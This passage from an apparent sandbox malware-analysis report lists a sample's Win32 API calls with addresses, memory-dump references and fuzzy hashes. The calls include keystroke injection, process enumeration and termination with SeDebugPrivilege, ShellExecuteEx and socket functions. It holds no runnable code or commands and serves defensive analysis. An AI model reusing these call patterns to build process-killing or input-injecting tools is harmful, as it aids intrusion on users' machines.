                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006396AB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006396AE
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 006396B7
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006396D5
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006396D8
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 006396E1
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006396F8
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006396FB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: cf17f3b55aa375e0f55a22a09357fead301bdf16610c7923a3e9f86d1d70d87f
                                                      • Instruction ID: e9a0ab36d43b2fa1ec1226b458104d628f68fcc5b8b64c1e1e3d3674efe52dfb
                                                      • Opcode Fuzzy Hash: cf17f3b55aa375e0f55a22a09357fead301bdf16610c7923a3e9f86d1d70d87f
                                                      • Instruction Fuzzy Hash: 1A11A571950618BEF7106F60EC4AF6A7B1EDB4D791F112429F244AB0A0C9F36C51DAF8
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0063853C,00000B00,?,?), ref: 0063892A
                                                      • HeapAlloc.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 00638931
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0063853C,00000B00,?,?), ref: 00638946
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0063853C,00000B00,?,?), ref: 0063894E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 00638951
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0063853C,00000B00,?,?), ref: 00638961
                                                      • GetCurrentProcess.KERNEL32(0063853C,00000000,?,0063853C,00000B00,?,?), ref: 00638969
                                                      • DuplicateHandle.KERNEL32(00000000,?,0063853C,00000B00,?,?), ref: 0063896C
                                                      • CreateThread.KERNEL32(00000000,00000000,00638992,00000000,00000000,00000000), ref: 00638986
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 163e4c2f0fb7b829600b7539ecc1785019c3845950db2c8e0e28e390ce960f0f
                                                      • Instruction ID: 109be522b77b3120b5c84695545d8041a4c19bc961ff3c232fdcf4b5521ea15d
                                                      • Opcode Fuzzy Hash: 163e4c2f0fb7b829600b7539ecc1785019c3845950db2c8e0e28e390ce960f0f
                                                      • Instruction Fuzzy Hash: 9D01BF75240304FFE710ABA5EC4DF677B6DEB89751F415421FA05DB191CAB19800CB60
                                                      APIs
                                                        • Part of subcall function 0063710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?,?,00637455), ref: 00637127
                                                        • Part of subcall function 0063710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637142
                                                        • Part of subcall function 0063710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637150
                                                        • Part of subcall function 0063710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?), ref: 00637160
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00659806
                                                      • _memset.LIBCMT ref: 00659813
                                                      • _memset.LIBCMT ref: 00659956
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00659982
                                                      • CoTaskMemFree.OLE32(?), ref: 0065998D
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 006599DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: b3f19c5ca957220d806727eb6878b38928011e1b2c690c338415d3bfdbada3b7
                                                      • Instruction ID: 5bae948b6650c0825f2dba15683cc269f23f2e0ff37c24fc34b3ce5f86e2890d
                                                      • Opcode Fuzzy Hash: b3f19c5ca957220d806727eb6878b38928011e1b2c690c338415d3bfdbada3b7
                                                      • Instruction Fuzzy Hash: 9E912971D00229EBDB14DFA5DC45EDEBBBABF48310F10415AF819A7291EB719A44CFA0
                                                      APIs
                                                        • Part of subcall function 00643C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00643C7A
                                                        • Part of subcall function 00643C55: Process32FirstW.KERNEL32(00000000,?), ref: 00643C88
                                                        • Part of subcall function 00643C55: CloseHandle.KERNEL32(00000000), ref: 00643D52
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065E9A4
                                                      • GetLastError.KERNEL32 ref: 0065E9B7
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0065E9E6
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0065EA63
                                                      • GetLastError.KERNEL32(00000000), ref: 0065EA6E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0065EAA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: b236919a051fd673ae9188d152da90a642a8a64a022a12edcbcdb637f6a176da
                                                      • Instruction ID: 7bf904500ffa4034d21fd196dfbf88933db02f5b8f6eb35819f8fc72aca8cdf3
                                                      • Opcode Fuzzy Hash: b236919a051fd673ae9188d152da90a642a8a64a022a12edcbcdb637f6a176da
                                                      • Instruction Fuzzy Hash: 4341B1716042019FDB18EF24DC95FADBBA6BF80310F04841CF9429B3D2CBB5A908CB95
                                                      APIs
                                                      • ShowWindow.USER32(006A57B0,00000000,00CB5880,?,?,006A57B0,?,0066B5A8,?,?), ref: 0066B712
                                                      • EnableWindow.USER32(00000000,00000000), ref: 0066B736
                                                      • ShowWindow.USER32(006A57B0,00000000,00CB5880,?,?,006A57B0,?,0066B5A8,?,?), ref: 0066B796
                                                      • ShowWindow.USER32(00000000,00000004,?,0066B5A8,?,?), ref: 0066B7A8
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0066B7CC
                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0066B7EF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 642888154-2594219639
                                                      • Opcode ID: 5081583299fe0110790adc93beb2cf2614afee63952a4bdaac1fd4ad0eadb7c6
                                                      • Instruction ID: 5e17d22f09c48d94fc483a280e4ce1a53f45e0344544ac3a54ea6939c6699381
                                                      • Opcode Fuzzy Hash: 5081583299fe0110790adc93beb2cf2614afee63952a4bdaac1fd4ad0eadb7c6
                                                      • Instruction Fuzzy Hash: 9B415834600254EFDB22CF28D499BD47FE2FB45311F1891B9E948CF6A2C771A896CB50
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00643033
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 7789a02efa0f0284c51a739997f5214d4e7a5fe036f005f623637ecf57e5d570
                                                      • Instruction ID: f86c0f85e9b34527db6a2cbe00343a8368b27335f0f9e63003c219c6af76edaf
                                                      • Opcode Fuzzy Hash: 7789a02efa0f0284c51a739997f5214d4e7a5fe036f005f623637ecf57e5d570
                                                      • Instruction Fuzzy Hash: D8112B313C8357BEDB549B14EC42CAB7B9E9F16720B20012AF900A67C2DBB15F4456A4
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00644312
                                                      • LoadStringW.USER32(00000000), ref: 00644319
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0064432F
                                                      • LoadStringW.USER32(00000000), ref: 00644336
                                                      • _wprintf.LIBCMT ref: 0064435C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0064437A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00644357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 2da96e6faf7848751f88158fa88ed1c6570e7399e9d086bede12f3b1f74c91fb
                                                      • Instruction ID: bce56f45e573ab89ddb474a070a9f7752b389c7c0052bdf2e9f8221e2d2bf957
                                                      • Opcode Fuzzy Hash: 2da96e6faf7848751f88158fa88ed1c6570e7399e9d086bede12f3b1f74c91fb
                                                      • Instruction Fuzzy Hash: 7701A2F2800208BFE7119BA0ED89FE7776DEB08700F0005A2F705E2151EAB05E854B70
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 005E2ACF
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 005E2B17
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 0061C21A
                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0061C1C7,00000004,00000000,00000000,00000000), ref: 0061C286
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 3b66140db7928a5470fbaefe93df0f3d383ab710a0ec2652651a680009bc6fc6
                                                      • Instruction ID: 6398a37797e4ac6840107b31d03ba0cb22ec9e9c0b582c3316980c37800e32f4
                                                      • Opcode Fuzzy Hash: 3b66140db7928a5470fbaefe93df0f3d383ab710a0ec2652651a680009bc6fc6
                                                      • Instruction Fuzzy Hash: 6441E8316086C09BC73D9B2ADC98BAE7F9BBB85310F18983DE0C786565C6B5A8C1D711
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 006470DD
                                                        • Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
                                                        • Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00647114
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00647130
                                                      • _memmove.LIBCMT ref: 0064717E
                                                      • _memmove.LIBCMT ref: 0064719B
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 006471AA
                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006471BF
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 006471DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 256516436-0
                                                      • Opcode ID: 16113ca48c7e8cea9fcd7b978c7898a0e5dcf9d69f34f8989742bdfeae631c6e
                                                      • Instruction ID: 53f757f5905971f4aaa02c96b26c363774562652377296037d10b863373755d6
                                                      • Opcode Fuzzy Hash: 16113ca48c7e8cea9fcd7b978c7898a0e5dcf9d69f34f8989742bdfeae631c6e
                                                      • Instruction Fuzzy Hash: 32316E31900205EBDB40DFA4DD85AAFB77AFF45710F1441A9F904AB286DB709E10CB64
                                                      APIs
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                        • Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9
                                                      • _wcstok.LIBCMT ref: 0064EC94
                                                      • _wcscpy.LIBCMT ref: 0064ED23
                                                      • _memset.LIBCMT ref: 0064ED56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                      • String ID: X
                                                      • API String ID: 774024439-3081909835
                                                      • Opcode ID: 8dcb6160b70f7ccb0255b65f0bb1db7606350798283739b0f0c51595f6a5e183
                                                      • Instruction ID: 9a1898b870a2daca4e70d43859580da74928a417591cac6ef62fbb465bb31636
                                                      • Opcode Fuzzy Hash: 8dcb6160b70f7ccb0255b65f0bb1db7606350798283739b0f0c51595f6a5e183
                                                      • Instruction Fuzzy Hash: B8C180715083429FC758EF24C885A9ABBE5FF85314F10492DF8999B2A2DB71EC45CB42
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00656C00
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00656C21
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00656C34
                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00656CEA
                                                      • inet_ntoa.WSOCK32(?), ref: 00656CA7
                                                        • Part of subcall function 0063A7E9: _strlen.LIBCMT ref: 0063A7F3
                                                        • Part of subcall function 0063A7E9: _memmove.LIBCMT ref: 0063A815
                                                      • _strlen.LIBCMT ref: 00656D44
                                                      • _memmove.LIBCMT ref: 00656DAD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3619996494-0
                                                      • Opcode ID: 42ac926540c13bb96acc040c0117743a35a2bef96d8b44ee6ca89c310fdbb0a7
                                                      • Instruction ID: 9baa85a2ee52e565d9061fa75f254a0f6b09623eb162b8a13f2f37d7b74bcb29
                                                      • Opcode Fuzzy Hash: 42ac926540c13bb96acc040c0117743a35a2bef96d8b44ee6ca89c310fdbb0a7
                                                      • Instruction Fuzzy Hash: 3581F171204301ABC714EF25DC86EABBBBAAFC4314F504A2CF9959B292DB70DD05CB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61e4b06c74d0f9e9da2869f782b1a850e8493f68ace8d1a14970d3a60cac3a9d
                                                      • Instruction ID: 3af97089dfc12f49c6489e995e9afcfa6a2a5df15365a2cf8e4d5fa5e09f0988
                                                      • Opcode Fuzzy Hash: 61e4b06c74d0f9e9da2869f782b1a850e8493f68ace8d1a14970d3a60cac3a9d
                                                      • Instruction Fuzzy Hash: 9D715930900549EFCF188F99CC49EBEBF79FF89310F148159F955AA291D730AA51CBA8
                                                      APIs
                                                      • _memset.LIBCMT ref: 0065F448
                                                      • _memset.LIBCMT ref: 0065F511
                                                      • ShellExecuteExW.SHELL32(?), ref: 0065F556
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                        • Part of subcall function 005FFC86: _wcscpy.LIBCMT ref: 005FFCA9
                                                      • GetProcessId.KERNEL32(00000000), ref: 0065F5CD
                                                      • CloseHandle.KERNEL32(00000000), ref: 0065F5FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: 38a44d25e7a0b0c5da39ac686e2fa65fbd6dad2aa215b97b621990a0af579684
                                                      • Instruction ID: 0b11ea5dbce8f350b3d3b4c628293dd50e590b558d5c16f17acf92fb20b49687
                                                      • Opcode Fuzzy Hash: 38a44d25e7a0b0c5da39ac686e2fa65fbd6dad2aa215b97b621990a0af579684
                                                      • Instruction Fuzzy Hash: C5619075A0061A9FCF18EF65C4859AEBBF6FF48310F148069E895AB361DB30AD45CB90
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00640F8C
                                                      • GetKeyboardState.USER32(?), ref: 00640FA1
                                                      • SetKeyboardState.USER32(?), ref: 00641002
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00641030
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0064104F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00641095
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006410B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: a53eb3582151f289331839a772b0854842d8aaf00fa0a90819a0cd6ec69f59b8
                                                      • Instruction ID: 5ffb02b1af116df4580184dfecdb049fbc8826d32fe6f71378d02f2e59151116
                                                      • Opcode Fuzzy Hash: a53eb3582151f289331839a772b0854842d8aaf00fa0a90819a0cd6ec69f59b8
                                                      • Instruction Fuzzy Hash: A951F1A05047D53DFB3243348C05BFABEAB6B07704F088589E2D98A9C2C6E8ECC9D751
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00640DA5
                                                      • GetKeyboardState.USER32(?), ref: 00640DBA
                                                      • SetKeyboardState.USER32(?), ref: 00640E1B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00640E47
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00640E64
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00640EA8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00640EC9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
